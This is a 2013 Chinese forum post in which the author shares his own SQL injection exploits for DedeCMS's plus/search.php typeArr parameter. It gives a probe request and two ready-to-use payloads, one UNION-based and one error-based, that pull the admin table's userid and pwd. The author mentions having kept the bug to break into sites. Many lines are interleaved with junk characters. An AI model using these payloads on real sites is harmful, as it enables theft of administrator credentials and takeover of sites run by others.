转载不加作者名的没JJ
# A$ l: {1 H: T9 o% I% L: O9 Z- ?" x" t- q/ p$ b9 Y& D
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
# d; R& I% m8 ~0 q% n Z. Y, @4 j
, C- [( I( G" H. Y既然已经发出来了,我就把我自己搞的exp发下吧。。唉。& z) r: J( u, d# ~) D
' l; Y" l+ |, L6 T& I7 c我一般是这样测试的:7 U' R! w `3 c4 y7 M/ j
w5 S! y, A- w. f' `, R7 _提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a/ K. z* B/ l. _ U4 i; O, C" W
( q$ J* z/ a* O6 t
转载不加作者名的没JJ5 j% l* _4 G r( @
* Y6 F3 l* b0 c5 w d$ F
作者:鬼哥
; f; [, ?8 d/ ?! B& m; r' g: g" t1 Y# R4 S! g' a4 s' R9 d- b
+ p! S5 H& Z( }% t1 j
" |, C/ Y _: f6 L9 q看结果如果提示% ]" z# i# o3 C& T& c2 I
: B# G& H T" C9 O0 k% }. BSafe Alert: Request Error step 2 !
3 w, d. H1 s6 x
/ b3 |$ H$ p/ J6 n" m那么直接用下面的exp! r1 k% x7 V. S7 p: f
3 d$ e7 U+ g7 F: U8 y$ O
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
1 P- Y6 I( [5 G$ U; q0 _/ j0 `8 A' ?2 v1 g: n2 V2 D; g8 ?1 I" T @
7 \% d: w$ L. Y! ?- Q# l4 |8 K' ]/ J看结果如果提示# e( T. ~7 @* b3 F' G" p1 {
# P/ w3 c. }8 @9 z% x; i2 F# OSafe Alert: Request Error step 1 !
8 X) c7 p G+ {& Y3 T" q: @
' T' r) r+ c- Q6 g# ?那么直接用下面的exp
X% H. s+ g0 _0 M& X, G" R4 Q
! U. p, P7 x8 m/ ]* m$ E) O4 Bxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
0 d, \9 X) R; L) I2 W, H
, s: C4 c+ Y; Z" h. t% R# ]0 y, X6 W Z
如果正常显示证明漏洞不存在了。. O7 m. N1 [% V6 r3 p2 i$ s5 L5 A
7 a; I; R3 L; j, X1 R转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对